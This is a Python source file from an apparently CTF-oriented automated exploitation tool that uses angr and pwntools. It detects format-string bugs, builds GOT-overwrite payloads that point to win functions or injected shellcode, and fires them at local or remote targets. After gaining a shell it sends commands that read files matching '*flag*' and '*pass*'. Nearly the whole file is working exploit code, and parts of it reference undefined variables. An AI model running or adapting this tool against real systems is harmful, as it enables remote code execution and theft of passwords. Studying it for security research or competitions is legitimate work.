from __future__ import print_function
from __future__ import absolute_import
import angr
from pwn import *
from .formatDetector import printFormat
from .overflowExploiter import getShellcode,getRegValues,findShellcode
import timeout_decorator
import time
import string


def exploitFormat(binary_name,properties):

    exploit_results = {}
    exploit_results['flag_found'] = False

    input_pos = properties['pwn_type']['position']
    input_len = properties['pwn_type']['length']
    input_string = properties['pwn_type']['input']

    #Slice constrolled input
    start_slice = input_string[:input_pos]
    end_slice = input_string[input_pos+input_len:]

    stack_position = -1
    print("[~] Locating buffer stack location")
    #Determine stack location
    for i in range(1, 50):
        iter_string = "aaaa_%{}$08x_".format(i)
        iter_string = assembleInput(iter_string,start_slice,end_slice,input_len)

        results = runIteration(binary_name,iter_string,input_type=properties['input_type'])
        if "61616161" in results: # 0x41414141 == "AAAA"
            stack_position = i
            print("[+] Found stack location at {}".format(stack_position))
            break

    if len(properties['win_functions']) > 0:
        for func in properties['win_functions']:
            address = properties['win_functions'][func]['fcn_addr']
            for got_name,got_addr in properties['protections']['got'].items():
                print("[~] Overwritting {}".format(got_name))
                writes = {got_addr:address}
                format_payload = fmtstr_payload(stack_position, writes, numbwritten=input_pos)
                if len(format_payload) > input_len:
                    print("[~] Format input to large, shrinking")
                    format_payload = fmtstr_payload(stack_position, writes, numbwritten=input_pos, write_size='short')

                format_input = assembleInput(format_payload,start_slice,end_slice,input_len)

                print(repr(format_input))
                results = sendExploit(binary_name,properties,format_input)
                if results['flag_found']:
                    exploit_results['flag_found'] = results['flag_found']
                    exploit_results['input'] = format_input
                    return exploit_results
        return exploit_results
    elif not properties['protections']['nx']:
        print("[+] Binary does not have NX")
        print("[+] Overwriting GOT entry to point to shellcode")
        rediscoverAndExploit(binary_name,properties,stack_position)
    else:
        print("[+] Overwriting GOT entry to point to one gadget RCE")

'''
Run until we hit our hooked printf.
Constrain input to crafted string:
    String = (Format GOT Write) + (Shellcode)
'''
def rediscoverAndExploit(binary_name,properties,stack_position):

    properties['shellcode'] = getShellcode(properties)
    properties['stack_position'] = stack_position
    inputType = properties['input_type']

    #p = angr.Project(binary_name,load_options={"auto_load_libs": False})
    p = angr.Project(binary_name)

    p.hook_symbol('printf',printFormatSploit)

    #Setup state based on input type
    argv = [binary_name]
    if inputType == "STDIN":
        '''
        angr doesn't use the right base and stack pointers
        when loading the binary, so our addresses are all wrong.
        So we need to grab them manually
        '''
        entryAddr = p.loader.main_object.entry
        reg_values = getRegValues(binary_name,entryAddr)
        state = p.factory.full_init_state(args=argv)

        register_names = state.arch.register_names.values()
        for register in register_names:
            if register in reg_values: #Didn't use the register
                state.registers.store(register,reg_values[register])

    elif inputType == "LIBPWNABLE":
        handle_connection = p.loader.main_object.get_symbol('handle_connection')
        state = p.factory.entry_state(addr=handle_connection.rebased_addr)
    else:
        arg = claripy.BVS("arg1", 300 * 8)
        argv.append(arg)
        state = p.factory.full_init_state(args=argv)
        state.globals['arg'] = arg

    state.globals['inputType'] = inputType
    state.globals['properties'] = properties
    simgr = p.factory.simgr(state, immutable=False)

    run_environ = {}
    run_environ['type'] = None
    end_state = None
    #Lame way to do a timeout
    try:
        @timeout_decorator.timeout(1200)
        def exploreBinary(simgr):
            simgr.explore(find=lambda s: 'type' in s.globals)

        exploreBinary(simgr)
        if 'found' in simgr.stashes and len(simgr.found):
            end_state = simgr.found[0]
            run_environ['type'] = end_state.globals['type']
            run_environ['position'] = end_state.globals['position']
            run_environ['length'] = end_state.globals['length']

    except (KeyboardInterrupt, timeout_decorator.TimeoutError) as e:
        print("[~] Format check timed out")
    if (inputType == "STDIN" or inputType == "LIBPWNABLE")and end_state is not None:
        stdin_str = str(end_state.posix.dumps(0))
        print("[+] Triggerable with STDIN : {}".format(stdin_str))
        run_environ['input'] = stdin_str
    elif inputType == "ARG" and end_state is not None:
        arg_str = str(end_state.solver.eval(arg,cast_to=str))
        run_environ['input'] = arg_str
        print("[+] Triggerable with arg : {}".format(arg_str))

    return run_environ


    pass

class printFormatSploit(angr.procedures.libc.printf.printf):
    IS_FUNCTION = True

    def checkExploitable(self):
        '''
        For each value passed to printf
        Check to see if there are any symbolic bytes
        Passed in that we control
        '''
        for i in xrange(5):

            if 'properties' not in self.state.globals:
                print("[-] Missing properties in globals!")
                exit(0)

            properties = self.state.globals['properties']

            state_copy = self.state.copy()
            
            solv = state_copy.solver.eval

            printf_arg = self.arg(i)

            var_loc = solv(printf_arg) #Assume it's a pointer

            if var_loc == 0:
                print("[-] Value at stack offset {} not a pointer".format(i))
                continue

            var_value = state_copy.memory.load(var_loc)

            var_value_length = int("0x"+str(var_value.length),16)

            symbolic_list = [state_copy.memory.load(var_loc + x).get_byte(0).symbolic for x in xrange(var_value_length)]


            '''
            Iterate over the characters in the string
            Checking for where our symbolic values are
            This helps in weird cases like:

            char myVal[100] = "I\'m cool ";
            strcat(myVal,STDIN);
            printf("My super cool string is %s",myVal);                                                                                   '''
            position = 0
            count = 0      
            greatest_count = 0
            prev_item = symbolic_list[0]
            for sym_i in range(1,len(symbolic_list)):
                    if symbolic_list[sym_i] and symbolic_list[sym_i] == symbolic_list[sym_i-1]:
                        count = count +1
                        if (count > greatest_count):
                            greatest_count = count
                            position = sym_i - count
                    else:
                        if (count > greatest_count):
                            greatest_count = count
                            position = sym_i - 1 - count
                            #previous position minus greatest count
                        count = 0
            print("[+] Found symbolic buffer at position {} of length {}".format(position,greatest_count))


            if greatest_count > 0:
                shellcode = properties['shellcode']
                stack_pos = properties['stack_position']

                for got_name,got_addr in properties['protections']['got'].items():
#                for got_name,got_addr in [(x,y) for (x,y) in properties['protections']['got'].items() if x in " exit"]: #debug for hard_format
                    backup_state = state_copy.copy()
                    print("[+] Overwiting {} at {}".format(got_name,hex(got_addr)))

                    solv = state_copy.solver.eval

                    #Mock write to get approx length
                    buffer_address = var_loc + position
                    writes = {got_addr:buffer_address} #Begining of buffer
                    format_write = fmtstr_payload(stack_pos, writes, numbwritten=position, write_size='short')
                    write_len = len(format_write)

                    #Real write
                    buffer_address = var_loc + position + write_len
                    writes = {got_addr:buffer_address}
                    format_write = fmtstr_payload(stack_pos, writes, numbwritten=position, write_size='short')

                    #Final payload
                    format_payload = format_write + shellcode

                    var_value_length = len(format_payload)
                    self.constrainBytes(state_copy,var_value,var_loc,position,var_value_length,strVal=format_payload)

                    print("[+] Format buffer at {}".format(hex(var_loc)))
                    print("[+] Shellcode located at {}".format(hex(buffer_address)))
                    print("[+] Format write:\n{}".format(repr(format_write)))
                    print("[+] Constructed payload:\n{}".format(repr(format_payload)))
                    print("[+] Constructed stdout:\n{}".format(repr(state_copy.posix.dumps(0).rstrip('\x00'))))

                    vuln_string = solv(var_value, cast_to=str)

                    binary_name = state_copy.project.filename
                    results = {}
                    results['flag_found'] = False
                    print('[~] Testing payload')
                    results = sendExploit(binary_name,properties,state_copy.posix.dumps(0))
                    if results['flag_found'] == True:
                        exploit_results['flag_found'] = results['flag_found']
                        exploit_results['input'] = format_input
                    else: #Maybe angr still messed up the pointer
                        print('[-] Payload launch failed. Fixing angr stack pointer')

                        #Find the last basic block executed
                        
                        first_input = state_copy.posix.dumps(0).rstrip('\x00')

                        end_eip = state_copy.se.eval(state_copy.regs.pc)

                        last_bb = [x for x in state_copy.trace if 'IRSB' in x][-1]
                        last_bb_addr = int(last_bb.split(' ')[2].rstrip(':'),16) #I'm sorry I'm parsing like this

                        ret_location = findShellcode(binary_name,last_bb_addr,shellcode,first_input)

                        if len(ret_location) == 0:
                            print("[-] Unable to find shellcode location for corrected stack")
                            finish_pointer = False
                        else:
                            real_location = ret_location[0]['offset']
                            finish_pointer = True

                        if finish_pointer:

                            state_copy = backup_state.copy()
                            
                            solv = state_copy.solver.eval

                            printf_arg = self.arg(i)

                            var_loc = solv(printf_arg) #Assume it's a pointer

                            if var_loc == 0:
                                print("[-] Value at stack offset {} not a pointer".format(i))
                                continue

                            var_value = state_copy.memory.load(var_loc)

                            var_value_length = int("0x"+str(var_value.length),16)



                            

                            writes = {got_addr:real_location}
                            format_write = fmtstr_payload(stack_pos, writes, numbwritten=position, write_size='short')
                            format_payload = format_write + properties['shellcode']
                            var_value_length = len(format_payload)
                            self.constrainBytes(state_copy,var_value,var_loc,position,var_value_length,strVal=format_payload)

                            print("[+] Shellcode located at {}".format(hex(real_location)))
                            print("[+] Adjusted payload:\n{}".format(repr(format_payload)))
                            print("[+] Constructed stdout:\n{}".format(repr(state_copy.posix.dumps(0).rstrip('\x00'))))

                            with open('command.input','w') as f:
                                f.write(state_copy.posix.dumps(0).rstrip('\x00'))

                            results_n = sendExploit(binary_name,properties,state_copy.posix.dumps(0).rstrip('\x00'))
                            if results_n['flag_found']:
                                print("[+] Vulnerable path found {}".format(repr(state_copy.posix.dumps(0).rstrip('\x00'))))
                                self.state.globals['type'] = "Format"
                                self.state.globals['position'] = position
                                self.state.globals['length'] = greatest_count
                                return True

                                #exploit_results['flag_found'] = results_n['flag_found']
                                #exploit_results['input'] = format_input

                    #Verify solution
                    if (state_copy.globals['inputType'] == "STDIN" or state_copy.globals['inputType'] == "LIBPWNABLE") and results_n['flag_found']:
                        stdin_str = str(state_copy.posix.dumps(0))
                        if format_payload in stdin_str or results['flag_found']:
                            var_value = self.state.memory.load(var_loc)
                            self.constrainBytes(self.state,var_value,var_loc,position,var_value_length,strVal=format_payload)
                            print("[+] Vulnerable path found {}".format(vuln_string))
                            self.state.globals['type'] = "Format"
                            self.state.globals['position'] = position
                            self.state.globals['length'] = greatest_count

                            return True
                    if state_copy.globals['inputType'] == "ARG":
                        arg = state.globals['arg']
                        arg_str = str(state_copy.solver.eval(arg,cast_to=str))
                        if format_payload in arg_str:
                            var_value = self.state.memory.load(var_loc)
                            self.constrainBytes(self.state,var_value,var_loc,position,var_value_length,strVal=format_payload)
                            print("[+] Vulnerable path found {}".format(vuln_string))
                            self.state.globals['type'] = "Format"
                            self.state.globals['position'] = position
                            self.state.globals['length'] = greatest_count
                            return True
                    state_copy = backup_state.copy()

        return False

    def constrainBytes(self, state, symVar, loc,position, length, strVal="%x_"):
        for i in range(length):
            strValIndex = i % len(strVal)
            curr_byte = self.state.memory.load(loc + i).get_byte(0)
            constraint = state.se.And(strVal[strValIndex] == curr_byte)
            if (state.se.satisfiable(extra_constraints=[constraint])):
                state.add_constraints(constraint)
            else:
                print("[~] Byte {} not constrained to {}".format(i,repr(strVal[strValIndex])))

    def run(self):
        if not self.checkExploitable():
            return super(type(self), self).run()


def getRemoteFormat(properties,remote_url,remote_port):
    exploit_results = {}

    input_pos = properties['pwn_type']['position']
    input_len = properties['pwn_type']['length']
    input_string = properties['pwn_type']['input']

    #Slice constrolled input
    start_slice = input_string[:input_pos]
    end_slice = input_string[input_pos+input_len:]

    stack_position = -1
    print("[~] Locating buffer stack location")
    #Determine stack location
    for i in range(1, 50):
        iter_string = "AAAA_%{}$08x_".format(i)
        iter_string = assembleInput(iter_string,start_slice,end_slice,input_len)

        results = runIteration(None,iter_string,remote_server=True,remote_url=remote_url,remote_port=remote_port)
        if "41414141" in results: # 0x41414141 == "AAAA"
            stack_position = i
            print("[+] Found stack location at {}".format(stack_position))
            break

    if properties['win_functions'] is not None:
        for func in properties['win_functions']:
            address = properties['win_functions'][func]['fcn_addr']
            for got_name,got_addr in properties['protections']['got'].items():
                print("[~] Overwritting {}".format(got_name))
                writes = {got_addr:address}
                format_payload = fmtstr_payload(stack_position, writes, numbwritten=input_pos)
                if len(format_payload) > input_len:
                    print("[~] Format input to large, shrinking")
                    format_payload = fmtstr_payload(stack_position, writes, numbwritten=input_pos, write_size='short')

                format_input = assembleInput(format_payload,start_slice,end_slice,input_len)

                print(repr(format_input))
                results = sendExploit(None,properties,format_input,remote_server=True,remote_url=remote_url,port_num=remote_port)
                if results['flag_found']:
                    exploit_results['flag_found'] = results['flag_found']
                    exploit_results['input'] = format_input
                    return exploit_results
        return exploit_results



'''
Maintain original input size
Change this later to use angr
And add these as constraints off a path
'''
def assembleInput(str_input,start_slice,end_slice,input_len):
    input_len
    str_len = len(str_input)
    for i in range(input_len - str_len):
        str_input += "A"
    return start_slice + str_input + end_slice

def runIteration(binary_name,str_input,remote_server=False,remote_url="",remote_port=0,input_type="STDIN"):
    
    if input_type == "STDIN" or input_type == "LIBPWNABLE":
        if remote_server:
            proc = remote(remote_url,remote_port)
        else:
            proc = process(binary_name)
        proc.sendline(str_input)

        results = proc.recvall(timeout=5)
        print(results)
        results_split = results.split('_')

        #Get only hex strings of 8 characters or fewer
        position_leak = [x for x in results_split if len(x) < 9 and all([y in string.hexdigits for y in x])]

        #There should only be one
        leak = [position_leak][0]
    else:
        proc = process([binary_name,str_input.rstrip('\x00')])
    
        results = proc.recvall(timeout=5)
        print(results)
        results_split = results.split('_')

        #Get only hex strings of 8 characters or fewer
        position_leak = [x for x in results_split if len(x) < 9 and all([y in string.hexdigits for y in x])]

        #There should only be one
        leak = [position_leak][0]

    
    return leak

def sendExploit(binary_name,properties,input_string,remote_server=False,remote_url="",port_num=0):

    send_results = {}
    hadIssue = False

    if properties['input_type'] == "STDIN" or properties['input_type'] == "LIBPWNABLE":
        #Create local or remote process
        if remote_server:
            proc = remote(remote_url,port_num)
        else:
            proc = process(binary_name)

        proc.sendline(input_string)
        #print(repr(input_string))

        #Sometimes the flag is just printed
        results = proc.recvall(timeout=15)
    else:
        try:
            proc = process([binary_name,input_string])
        except:
            print("[-] Issue with nulls in arg")
            hadIssue = True


        #print(repr(input_string))

        #Sometimes the flag is just printed
    if not hadIssue:
        results = proc.recvall(timeout=15)


    send_results['flag_found'] = False
    if not hadIssue and '{' in results and '}' in results:
        send_results['flag_found'] = True
        print("[+] Flag found:")
        print(results.replace('\x20\x20',''))
    #Flag not in stdout, we have a shell
    else:

        if properties['input_type'] == "STDIN" or properties['input_type'] == "LIBPWNABLE":
            if remote_server:
                proc = remote(remote_url,port_num)
            else:
                proc = process(binary_name)
            proc.sendline(input_string)
        else:
            try:
                proc = process([binary_name,input_string])
            except:
                print("[-] Issue with nulls in arg")

        try:
            proc.sendline()
            proc.sendline("ls;\n")
            proc.sendline("cat *flag*;\n")
            proc.sendline("cat *pass*;\n")
            command_results = proc.recvall(timeout=30) #Need a better way to "time out"
            #print(command_results)
            if '{' in command_results and '}' in command_results:
                send_results['flag_found'] = True
                print("[+] Flag found:")
                print(command_results.replace('\x20\x20',''))
        except:
            pass

    return send_results
